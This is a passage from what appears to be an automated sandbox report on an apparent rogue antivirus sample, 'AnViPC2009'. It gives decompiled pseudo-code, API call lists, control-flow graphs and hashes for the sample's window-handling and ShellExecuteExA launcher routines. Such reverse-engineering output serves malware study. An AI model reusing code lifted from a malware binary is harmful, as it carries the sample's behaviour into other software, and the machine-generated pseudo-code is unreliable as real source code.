                                                                                                                                                  				return SendMessageA(_v8, 0xc2, 0, "\r\n");
                                                                                                                                                  			}











                                                                                                                                                  0x0040ad43
                                                                                                                                                  0x0040ad45
                                                                                                                                                  0x0040ad4d
                                                                                                                                                  0x0040ad4f
                                                                                                                                                  0x0040ad55
                                                                                                                                                  0x0040ad5d
                                                                                                                                                  0x0040ad69
                                                                                                                                                  0x0040ad78
                                                                                                                                                  0x0040ad7a
                                                                                                                                                  0x0040ad7a
                                                                                                                                                  0x0040ad8c
                                                                                                                                                  0x0040ad9c
                                                                                                                                                  0x0040ada3
                                                                                                                                                  0x0040adac
                                                                                                                                                  0x0040adb0
                                                                                                                                                  0x0040adb3
                                                                                                                                                  0x0040adc0
                                                                                                                                                  0x0040adc3
                                                                                                                                                  0x0040adca
                                                                                                                                                  0x0040adca
                                                                                                                                                  0x0040adde
                                                                                                                                                  0x0040aded
                                                                                                                                                  0x0040adf5
                                                                                                                                                  0x0040adfb
                                                                                                                                                  0x0040ae08
                                                                                                                                                  0x0040ae19
                                                                                                                                                  0x0040ae19
                                                                                                                                                  0x0040ae30

                                                                                                                                                  APIs
                                                                                                                                                  • GetDlgItem.USER32 ref: 0040AD30
                                                                                                                                                  • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,0040AE68), ref: 0040AD5D
                                                                                                                                                  • SendMessageA.USER32(00000000,000000B1,00000000,000000FF), ref: 0040AD69
                                                                                                                                                  • SendMessageA.USER32(00000000,000000C2,00000000,004125AA), ref: 0040AD78
                                                                                                                                                  • SendMessageA.USER32(?,000000B1,05F5E100,05F5E100), ref: 0040AD8C
                                                                                                                                                  • SendMessageA.USER32(?,0000043A,00000000,?), ref: 0040ADA3
                                                                                                                                                  • SendMessageA.USER32(?,00000444,00000001,0000003C), ref: 0040ADDE
                                                                                                                                                  • SendMessageA.USER32(?,000000C2,00000000,0040AE68), ref: 0040ADED
                                                                                                                                                  • SendMessageA.USER32(?,000000B1,05F5E100,05F5E100), ref: 0040ADF5
                                                                                                                                                  • SendMessageA.USER32(?,00000444,00000001,0000003C), ref: 0040AE19
                                                                                                                                                  • SendMessageA.USER32(?,000000C2,00000000,004125E0), ref: 0040AE2A
                                                                                                                                                    • Part of subcall function 0040645E: DestroyWindow.USER32(?,762CB980,0040AD5A), ref: 00406469
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$Window$DestroyItemShow
                                                                                                                                                  • String ID: <
                                                                                                                                                  • API String ID: 2996232536-4251816714
                                                                                                                                                  • Opcode ID: 4cd09c08f60114875b86b86bde568e417490804e04dbe5cc682871dcf93f9856
                                                                                                                                                  • Instruction ID: e8e95ed800ab3f44f49925a5d61679fad07d67b3d58fa812c9eb088bb9a80cfc
                                                                                                                                                  • Opcode Fuzzy Hash: 4cd09c08f60114875b86b86bde568e417490804e04dbe5cc682871dcf93f9856
                                                                                                                                                  • Instruction Fuzzy Hash: E4319F71E40218BAEB119BA0DC4AFEE7E79EB41714F108129F601BA1E0C7B51E20DB69
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 774 411677-4116bf LoadLibraryA * 2 #17 LoadLibraryA 775 4116c1-4116cf GetProcAddress 774->775 776 4116de-4116ee SHGetMalloc 774->776 777 4116d1-4116d4 775->777 778 4116d7-4116d8 FreeLibrary 775->778 777->778 778->776
                                                                                                                                                  C-Code - Quality: 53%
                                                                                                                                                  			E00411677(signed int* __ecx) {
                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                  				char _v12;
                                                                                                                                                  				struct HINSTANCE__* _t7;
                                                                                                                                                  				_Unknown_base(*)()* _t11;
                                                                                                                                                  				void* _t16;
                                                                                                                                                  				struct HINSTANCE__* _t18;
                                                                                                                                                  				void* _t20;
                                                                                                                                                  				struct HINSTANCE__** _t21;
                                                                                                                                                  
                                                                                                                                                  				_t21 = __ecx;
                                                                                                                                                  				__ecx[1] = __ecx[1] & 0x00000000;
                                                                                                                                                  				 *__ecx =  *__ecx & 0x00000000;
                                                                                                                                                  				_t7 = LoadLibraryA("riched32.dll"); // executed
                                                                                                                                                  				 *_t21 = _t7;
                                                                                                                                                  				_t21[1] = LoadLibraryA("riched20.dll");
                                                                                                                                                  				__imp__#17(_t16, _t20, __ecx, __ecx);
                                                                                                                                                  				_v12 = 8;
                                                                                                                                                  				_v8 = 0x7ff;
                                                                                                                                                  				_t18 = LoadLibraryA("COMCTL32.DLL");
                                                                                                                                                  				if(_t18 != 0) {
                                                                                                                                                  					_t11 = GetProcAddress(_t18, "InitCommonControlsEx");
                                                                                                                                                  					if(_t11 != 0) {
                                                                                                                                                  						 *_t11( &_v12);
                                                                                                                                                  					}
                                                                                                                                                  					FreeLibrary(_t18);
                                                                                                                                                  				}
                                                                                                                                                  				__imp__SHGetMalloc(0x41fff0); // executed
                                                                                                                                                  				return _t21;
                                                                                                                                                  			}











                                                                                                                                                  0x00411684
                                                                                                                                                  0x00411686
                                                                                                                                                  0x0041168a
                                                                                                                                                  0x00411692
                                                                                                                                                  0x00411699
                                                                                                                                                  0x0041169d
                                                                                                                                                  0x004116a0
                                                                                                                                                  0x004116ab
                                                                                                                                                  0x004116b2
                                                                                                                                                  0x004116bb
                                                                                                                                                  0x004116bf
                                                                                                                                                  0x004116c7
                                                                                                                                                  0x004116cf
                                                                                                                                                  0x004116d5
                                                                                                                                                  0x004116d5
                                                                                                                                                  0x004116d8
                                                                                                                                                  0x004116d8
                                                                                                                                                  0x004116e3
                                                                                                                                                  0x004116ee

                                                                                                                                                  APIs
                                                                                                                                                  • LoadLibraryA.KERNELBASE(riched32.dll,00000000,C:\Users\user\Desktop\Endermanch@AnViPC2009.exe,?,?,?,0040D47E), ref: 00411692
                                                                                                                                                  • LoadLibraryA.KERNEL32(riched20.dll,?,0040D47E), ref: 0041169B
                                                                                                                                                  • #17.COMCTL32(?,0040D47E), ref: 004116A0
                                                                                                                                                  • LoadLibraryA.KERNEL32(COMCTL32.DLL,?,0040D47E), ref: 004116B9
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004116C7
                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,0040D47E), ref: 004116D8
                                                                                                                                                  • SHGetMalloc.SHELL32(0041FFF0), ref: 004116E3
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Library$Load$AddressFreeMallocProc
                                                                                                                                                  • String ID: C:\Users\user\Desktop\Endermanch@AnViPC2009.exe$COMCTL32.DLL$InitCommonControlsEx$riched20.dll$riched32.dll
                                                                                                                                                  • API String ID: 253899923-355349855
                                                                                                                                                  • Opcode ID: d381e30bf539c4c6666b99e59a21923ea705f1a00c5b232db6d3ab69148d256d
                                                                                                                                                  • Instruction ID: 2fdee5a4d2cde908a7e0198c494462a25550f93c786c886906295ffe04c9ed6d
                                                                                                                                                  • Opcode Fuzzy Hash: d381e30bf539c4c6666b99e59a21923ea705f1a00c5b232db6d3ab69148d256d
                                                                                                                                                  • Instruction Fuzzy Hash: B0F0A971510304BBD7106BA5DE09BEEBAE8DF81711F25852EE541D3150DBFCD490CB68
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 779 40bd59-40bd70 call 40a35d 782 40bd76-40bd97 call 40a262 779->782 783 40bf6d-40bf6f 779->783 786 40bda1 782->786 787 40bd99-40bd9f 782->787 788 40bda4-40bda8 786->788 787->788 789 40bde9-40bdec 788->789 790 40bdaa 788->790 791 40bdfd-40be11 call 407669 789->791 792 40bdee-40bdf4 789->792 793 40bdac-40bdaf 790->793 802 40be13-40be20 call 40a573 791->802 803 40be29-40be37 call 40572e 791->803 792->791 797 40bdf6 792->797 795 40bdb1 793->795 796 40bdc5-40bdc9 793->796 799 40bdb9-40bdbd 795->799 800 40bdcb-40bdd0 796->800 801 40bddc-40bde1 796->801 797->791 804 40bdb3-40bdb7 799->804 805 40bdbf 799->805 800->801 806 40bdd2-40bdd8 800->806 807 40bde3 801->807 808 40bde5-40bde6 801->808 802->803 815 40be22 802->815 816 40be51-40be54 803->816 817 40be39-40be4e call 4057e4 803->817 804->799 809 40bdc1 804->809 805->796 806->793 812 40bdda 806->812 807->808 808->789 809->796 812->789 815->803 819 40be90-40bea3 ShellExecuteExA 816->819 820 40be56-40be59 816->820 817->816 821 40bec2-40bed1 819->821 822 40bea5-40bebc ShellExecuteExA 819->822 820->819 824 40be5b-40be8a call 40a450 call 40a5bb call 40572e 820->824 826 40bed3-40bed6 821->826 827 40bed8-40bedf 821->827 822->821 825 40bf6b-40bf6c 822->825 824->819 824->825 825->783 826->827 830 40bf0f-40bf1b CloseHandle 826->830 831 40bee1-40beea IsWindowVisible 827->831 832 40bef9-40bf0a WaitForInputIdle call 40b6c3 827->832 836 40bf1d-40bf2c call 40a573 830->836 837 40bf2e-40bf34 830->837 831->832 834 40beec-40bef5 ShowWindow 831->834 832->830 834->832 836->837 846 40bf5c-40bf5f 836->846 840 40bf42-40bf55 837->840 841 40bf36-40bf39 837->841 845 40bf56 Sleep 840->845 841->840 844 40bf3b-40bf40 841->844 844->845 845->846 846->825 848 40bf61-40bf69 ShowWindow 846->848 848->825
                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0040BD59(char* __eax, void* __ecx, long _a4) {
                                                                                                                                                  				char _v5;
                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                  				struct _SHELLEXECUTEINFOA _v72;
                                                                                                                                                  				char _v1096;
                                                                                                                                                  				char _v2120;
                                                                                                                                                  				void* _t56;
                                                                                                                                                  				void* _t59;
                                                                                                                                                  				intOrPtr _t60;
                                                                                                                                                  				char _t61;
                                                                                                                                                  				signed int _t63;
                                                                                                                                                  				struct HWND__* _t65;
                                                                                                                                                  				long _t68;
                                                                                                                                                  				void* _t85;
                                                                                                                                                  				char* _t86;
                                                                                                                                                  				long _t87;
                                                                                                                                                  				char _t93;
                                                                                                                                                  				char* _t94;
                                                                                                                                                  				long _t96;
                                                                                                                                                  				char* _t99;
                                                                                                                                                  				intOrPtr _t121;
                                                                                                                                                  				intOrPtr _t127;
                                                                                                                                                  
                                                                                                                                                  				_t99 = __eax;
                                                                                                                                                  				_t56 = E0040A35D(__ecx, __eax);
                                                                                                                                                  				if(_t56 >= 0x3f6) {
                                                                                                                                                  					return _t56;
                                                                                                                                                  				}
                                                                                                                                                  				_t96 = 0x3c;
                                                                                                                                                  				E0040A262(__ecx,  &_v72, 0, _t96);
                                                                                                                                                  				_t93 =  *_t99;
                                                                                                                                                  				_v72.cbSize = _t96;
                                                                                                                                                  				_v72.fMask = 0x5c0;
                                                                                                                                                  				if(_t93 != 0x22) {
                                                                                                                                                  					_v72.lpFile = _t99;
                                                                                                                                                  				} else {
                                                                                                                                                  					_v72.lpFile = _t99 + 1;
                                                                                                                                                  				}
                                                                                                                                                  				_t59 = 0;
                                                                                                                                                  				if(_t93 == 0) {
                                                                                                                                                  					L19:
                                                                                                                                                  					if(_a4 == 0 &&  *0x41a392 != 0) {
                                                                                                                                                  						_v72.lpParameters = 0x41a392;
                                                                                                                                                  					}
                                                                                                                                                  					_v72.nShow = 1;
                                                                                                                                                  					_t60 = E00407669(_v72.lpFile);
                                                                                                                                                  					_v12 = _t60;
                                                                                                                                                  					if(_t60 != 0) {
                                                                                                                                                  						_t85 = E0040A573(_t60, ".inf");
                                                                                                                                                  						_t112 = _t85;
                                                                                                                                                  						if(_t85 == 0) {
                                                                                                                                                  							_v72.lpVerb = "Install";
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					_t61 = E0040572E(_t112, _v72.lpFile, 0);
                                                                                                                                                  					_v5 = _t61;
                                                                                                                                                  					if(_t61 != 0) {
                                                                                                                                                  						E004057E4(_v72.lpFile,  &_v2120);
                                                                                                                                                  						_v72.lpFile =  &_v2120;
                                                                                                                                                  					}
                                                                                                                                                  					if(_a4 == 0) {
                                                                                                                                                  						L30:
                                                                                                                                                  						_t63 = ShellExecuteExA( &_v72); // executed
                                                                                                                                                  						if((_t63 & 0xffffff00 | _t63 != 0x00000000) != 0) {
                                                                                                                                                  							L32:
                                                                                                                                                  							_v5 = 0;
                                                                                                                                                  							_t121 =  *0x419f88; // 0x0
                                                                                                                                                  							if(_t121 != 0 || _a4 != 0) {
                                                                                                                                                  								_t65 =  *0x419f80; // 0x0
                                                                                                                                                  								if(_t65 != 0 && IsWindowVisible(_t65) != 0) {
                                                                                                                                                  									ShowWindow( *0x419f80, 0);
                                                                                                                                                  									_v5 = 1;
                                                                                                                                                  								}
                                                                                                                                                  								WaitForInputIdle(_v72.hProcess, 0x7d0);
                                                                                                                                                  								E0040B6C3(_v72.hProcess);
                                                                                                                                                  							}
                                                                                                                                                  							_t68 = CloseHandle(_v72.hProcess);
                                                                                                                                                  							if(_v12 == 0) {
                                                                                                                                                  								L40:
                                                                                                                                                  								_t127 =  *0x419f88; // 0x0
                                                                                                                                                  								if(_t127 == 0 || _a4 != 0) {
                                                                                                                                                  									__eflags = _a4;
                                                                                                                                                  									_t68 = ((0 | _a4 == 0x00000000) - 0x00000001 & 0xfffffce0) + 0x3e8;
                                                                                                                                                  									__eflags = _t68;
                                                                                                                                                  									Sleep(_t68);
                                                                                                                                                  								} else {
                                                                                                                                                  									Sleep(0x1b58);
                                                                                                                                                  								}
                                                                                                                                                  								goto L45;
                                                                                                                                                  							} else {
                                                                                                                                                  								_t68 = E0040A573(_v12, ".exe");
                                                                                                                                                  								if(_t68 == 0) {
                                                                                                                                                  									L45:
                                                                                                                                                  									if(_v5 != 0) {
                                                                                                                                                  										_t68 = ShowWindow( *0x419f80, 1);
                                                                                                                                                  									}
                                                                                                                                                  									goto L47;
                                                                                                                                                  								}
                                                                                                                                                  								goto L40;
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						_v72.fMask = _v72.fMask & 0xfffffbff;
                                                                                                                                                  						_v72.lpFile = _t99;
                                                                                                                                                  						_t68 = ShellExecuteExA( &_v72) & 0xffffff00 | _t76 != 0x00000000;
                                                                                                                                                  						if(_t68 == 0) {
                                                                                                                                                  							goto L47;
                                                                                                                                                  						}
                                                                                                                                                  						goto L32;
                                                                                                                                                  					} else {
                                                                                                                                                  						_t115 = _v5;
                                                                                                                                                  						if(_v5 != 0) {
                                                                                                                                                  							goto L30;
                                                                                                                                                  						}
                                                                                                                                                  						E0040A450( &_v1096, _v72.lpFile);
                                                                                                                                                  						E0040A5BB( &_v1096, ".exe");
                                                                                                                                                  						_t68 = E0040572E(_t115,  &_v1096, 0);
                                                                                                                                                  						if(_t68 == 0) {
                                                                                                                                                  							L47:
                                                                                                                                                  							return _t68;
                                                                                                                                                  						}
                                                                                                                                                  						goto L30;
                                                                                                                                                  					}
                                                                                                                                                  				} else {
                                                                                                                                                  					_t94 = _t99;
                                                                                                                                                  					do {
                                                                                                                                                  						if( *_t94 != 0x22) {
                                                                                                                                                  							L12:
                                                                                                                                                  							if( *((char*)(_t59 + _t99)) == 0x20 ||  *((char*)(_t59 + _t99 + 1)) == 0x2f) {
                                                                                                                                                  								_t86 = _t59 + _t99;
                                                                                                                                                  								__eflags =  *_t86 - 0x20;
                                                                                                                                                  								if( *_t86 == 0x20) {
                                                                                                                                                  									 *_t86 = 0;
                                                                                                                                                  								}
                                                                                                                                                  								_t87 = _t86 + 1;
                                                                                                                                                  								__eflags = _t87;
                                                                                                                                                  								_v72.lpParameters = _t87;
                                                                                                                                                  								goto L19;
                                                                                                                                                  							} else {
                                                                                                                                                  								goto L14;
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						while(1) {
                                                                                                                                                  							_t59 = _t59 + 1;
                                                                                                                                                  							if( *((intOrPtr*)(_t59 + _t99)) == 0) {
                                                                                                                                                  								break;
                                                                                                                                                  							}
                                                                                                                                                  							__eflags =  *((char*)(_t59 + _t99)) - 0x22;
                                                                                                                                                  							if(__eflags == 0) {
                                                                                                                                                  								 *((char*)(_t59 + _t99)) = 0x20;
                                                                                                                                                  								goto L12;
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						goto L12;
                                                                                                                                                  						L14:
                                                                                                                                                  						_t59 = _t59 + 1;
                                                                                                                                                  						_t94 = _t59 + _t99;
                                                                                                                                                  					} while ( *_t94 != 0);
                                                                                                                                                  					goto L19;
                                                                                                                                                  				}
                                                                                                                                                  			}
























                                                                                                                                                  0x0040bd63
                                                                                                                                                  0x0040bd66
                                                                                                                                                  0x0040bd70
                                                                                                                                                  0x0040bf6f
                                                                                                                                                  0x0040bf6f
                                                                                                                                                  0x0040bd7a
                                                                                                                                                  0x0040bd83
                                                                                                                                                  0x0040bd88
                                                                                                                                                  0x0040bd8a
                                                                                                                                                  0x0040bd8d
                                                                                                                                                  0x0040bd97
                                                                                                                                                  0x0040bda1
                                                                                                                                                  0x0040bd99
                                                                                                                                                  0x0040bd9c
                                                                                                                                                  0x0040bd9c
                                                                                                                                                  0x0040bda4
                                                                                                                                                  0x0040bda8
                                                                                                                                                  0x0040bde9
                                                                                                                                                  0x0040bdec
                                                                                                                                                  0x0040bdf6
                                                                                                                                                  0x0040bdf6
                                                                                                                                                  0x0040be00
                                                                                                                                                  0x0040be07
                                                                                                                                                  0x0040be0c
                                                                                                                                                  0x0040be11
                                                                                                                                                  0x0040be19
                                                                                                                                                  0x0040be1e
                                                                                                                                                  0x0040be20
                                                                                                                                                  0x0040be22
                                                                                                                                                  0x0040be22
                                                                                                                                                  0x0040be20
                                                                                                                                                  0x0040be2d
                                                                                                                                                  0x0040be32
                                                                                                                                                  0x0040be37
                                                                                                                                                  0x0040be43
                                                                                                                                                  0x0040be4e
                                                                                                                                                  0x0040be4e
                                                                                                                                                  0x0040be54
                                                                                                                                                  0x0040be90
                                                                                                                                                  0x0040be9a
                                                                                                                                                  0x0040bea3
                                                                                                                                                  0x0040bec2
                                                                                                                                                  0x0040bec8
                                                                                                                                                  0x0040becb
                                                                                                                                                  0x0040bed1
                                                                                                                                                  0x0040bed8
                                                                                                                                                  0x0040bedf
                                                                                                                                                  0x0040bef3
                                                                                                                                                  0x0040bef5
                                                                                                                                                  0x0040bef5
                                                                                                                                                  0x0040bf01
                                                                                                                                                  0x0040bf0a
                                                                                                                                                  0x0040bf0a
                                                                                                                                                  0x0040bf12
                                                                                                                                                  0x0040bf1b
                                                                                                                                                  0x0040bf2e
                                                                                                                                                  0x0040bf2e
                                                                                                                                                  0x0040bf34
                                                                                                                                                  0x0040bf44
                                                                                                                                                  0x0040bf50
                                                                                                                                                  0x0040bf50
                                                                                                                                                  0x0040bf56
                                                                                                                                                  0x0040bf3b
                                                                                                                                                  0x0040bf56
                                                                                                                                                  0x0040bf56
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bf1d
                                                                                                                                                  0x0040bf25
                                                                                                                                                  0x0040bf2c
                                                                                                                                                  0x0040bf5c
                                                                                                                                                  0x0040bf5f
                                                                                                                                                  0x0040bf69
                                                                                                                                                  0x0040bf69
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bf5f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bf2c
                                                                                                                                                  0x0040bf1b
                                                                                                                                                  0x0040bea5
                                                                                                                                                  0x0040beb0
                                                                                                                                                  0x0040beb7
                                                                                                                                                  0x0040bebc
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040be56
                                                                                                                                                  0x0040be56
                                                                                                                                                  0x0040be59
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040be65
                                                                                                                                                  0x0040be76
                                                                                                                                                  0x0040be83
                                                                                                                                                  0x0040be8a
                                                                                                                                                  0x0040bf6b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bf6c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040be8a
                                                                                                                                                  0x0040bdaa
                                                                                                                                                  0x0040bdaa
                                                                                                                                                  0x0040bdac
                                                                                                                                                  0x0040bdaf
                                                                                                                                                  0x0040bdc5
                                                                                                                                                  0x0040bdc9
                                                                                                                                                  0x0040bddc
                                                                                                                                                  0x0040bdde
                                                                                                                                                  0x0040bde1
                                                                                                                                                  0x0040bde3
                                                                                                                                                  0x0040bde3
                                                                                                                                                  0x0040bde5
                                                                                                                                                  0x0040bde5
                                                                                                                                                  0x0040bde6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bdc9
                                                                                                                                                  0x0040bdb9
                                                                                                                                                  0x0040bdb9
                                                                                                                                                  0x0040bdbd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bdb3
                                                                                                                                                  0x0040bdb7
                                                                                                                                                  0x0040bdc1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bdc1
                                                                                                                                                  0x0040bdb7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bdd2
                                                                                                                                                  0x0040bdd2
                                                                                                                                                  0x0040bdd3
                                                                                                                                                  0x0040bdd6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bdda

                                                                                                                                                  APIs
                                                                                                                                                  • ShellExecuteExA.SHELL32(?,?,00000000,?,?,00000000,0000003C), ref: 0040BE9A
                                                                                                                                                  • ShellExecuteExA.SHELL32(?), ref: 0040BEB3
                                                                                                                                                  • IsWindowVisible.USER32 ref: 0040BEE2
                                                                                                                                                  • ShowWindow.USER32(00000000), ref: 0040BEF3
                                                                                                                                                  • WaitForInputIdle.USER32 ref: 0040BF01
                                                                                                                                                  • CloseHandle.KERNEL32(?,?), ref: 0040BF12
                                                                                                                                                  • Sleep.KERNEL32(-000003E9), ref: 0040BF56
                                                                                                                                                  • ShowWindow.USER32(00000001), ref: 0040BF69
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$ExecuteShellShow$CloseHandleIdleInputSleepVisibleWait
                                                                                                                                                  • String ID: .exe$.inf$X&A
                                                                                                                                                  • API String ID: 1160896117-59479332
                                                                                                                                                  • Opcode ID: 0da94162a2e766bdbe82b1bfe66c37a068abecef2229ffbeaeae6bfa85b50b3e
                                                                                                                                                  • Instruction ID: 10db50892544c82e3e987b9d54ba19f99f0ac7ddaf3a66f55f7d51236d57b0a1
                                                                                                                                                  • Opcode Fuzzy Hash: 0da94162a2e766bdbe82b1bfe66c37a068abecef2229ffbeaeae6bfa85b50b3e
                                                                                                                                                  • Instruction Fuzzy Hash: 6251D171845289BEDF21DBA0DC45ADE7B69EF00304F1840BBE540F72D2D73989859B8D
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 849 4096e7-40973f call 409610 GetWindowRect GetClientRect 852 409741-409745 849->852 853 409774-409778 849->853 854 4097b4-4097d3 GetSystemMetrics GetWindow 852->854 855 409747-40976e SetWindowPos 852->855 853->854 856 40977a-4097ae GetWindowTextA call 40952c SetWindowTextA 853->856 858 4098aa-4098ac 854->858 855->853 856->854 859 4098b2-4098b6 858->859 860 4097d8-4097df 858->860 860->859 862 4097e5-409801 GetWindowTextA 860->862 863 409803-409822 call 40952c SetWindowTextA 862->863 864 409828-40982c 862->864 863->864 865 409894-4098a5 GetWindow 864->865 866 40982e-40988e GetWindowRect SetWindowPos 864->866 865->859 868 4098a7 865->868 866->865 868->858
                                                                                                                                                  C-Code - Quality: 64%
                                                                                                                                                  			E004096E7(intOrPtr __ecx, void* __eflags, signed int _a4, intOrPtr _a8, struct HWND__* _a12) {
                                                                                                                                                  				char _v5;
                                                                                                                                                  				signed int _v12;
                                                                                                                                                  				signed int _v16;
                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                  				struct HWND__* _v24;
                                                                                                                                                  				struct tagRECT _v40;
                                                                                                                                                  				struct tagRECT _v56;
                                                                                                                                                  				struct tagRECT _v72;
                                                                                                                                                  				char _v1096;
                                                                                                                                                  				signed int _t96;
                                                                                                                                                  				struct HWND__* _t98;
                                                                                                                                                  				signed int _t116;
                                                                                                                                                  				signed int _t123;
                                                                                                                                                  				signed int _t147;
                                                                                                                                                  				signed int _t150;
                                                                                                                                                  				signed int _t153;
                                                                                                                                                  				void* _t163;
                                                                                                                                                  				void* _t167;
                                                                                                                                                  				void* _t168;
                                                                                                                                                  
                                                                                                                                                  				_v20 = __ecx;
                                                                                                                                                  				_v5 = E00409610(__ecx, __eflags, _a8,  &_v16,  &_v12);
                                                                                                                                                  				GetWindowRect(_a4,  &_v40);
                                                                                                                                                  				GetClientRect(_a4,  &_v72);
                                                                                                                                                  				_t96 = _v72.bottom;
                                                                                                                                                  				_t163 = _v40.right - _v72.right - _v40.left + 1;
                                                                                                                                                  				_t167 = _v40.bottom - _t96 - _v40.top + 1;
                                                                                                                                                  				if(_v5 == 0) {
                                                                                                                                                  					L3:
                                                                                                                                                  					if(_a12 == 0) {
                                                                                                                                                  						GetWindowTextA(_a4,  &_v1096, 0x400);
                                                                                                                                                  						E0040952C(_v20,  &_v1096,  &_v1096, 1, _a8);
                                                                                                                                                  						SetWindowTextA(_a4,  &_v1096); // executed
                                                                                                                                                  					}
                                                                                                                                                  					L5:
                                                                                                                                                  					_t168 = _t167 - GetSystemMetrics(8);
                                                                                                                                                  					_t98 = GetWindow(_a4, 5);
                                                                                                                                                  					_a4 = _a4 & 0x00000000;
                                                                                                                                                  					_a12 = _t98;
                                                                                                                                                  					_v24 = _t98;
                                                                                                                                                  					while(_t98 != 0) {
                                                                                                                                                  						__eflags = _a4 - 0x200;
                                                                                                                                                  						if(_a4 >= 0x200) {
                                                                                                                                                  							break;
                                                                                                                                                  						}
                                                                                                                                                  						GetWindowTextA(_a12,  &_v1096, 0x400); // executed
                                                                                                                                                  						__eflags = _v1096;
                                                                                                                                                  						if(_v1096 != 0) {
                                                                                                                                                  							E0040952C(_v20,  &_v1096,  &_v1096, 1, _a8);
                                                                                                                                                  							SetWindowTextA(_a12,  &_v1096); // executed
                                                                                                                                                  						}
                                                                                                                                                  						__eflags = _v5;
                                                                                                                                                  						if(_v5 != 0) {
                                                                                                                                                  							GetWindowRect(_a12,  &_v56);
                                                                                                                                                  							_push(0x204);
                                                                                                                                                  							asm("cdq");
                                                                                                                                                  							_t147 = 0x64;
                                                                                                                                                  							_push((_v56.bottom - _v56.top + 1) * _v12 / _t147);
                                                                                                                                                  							asm("cdq");
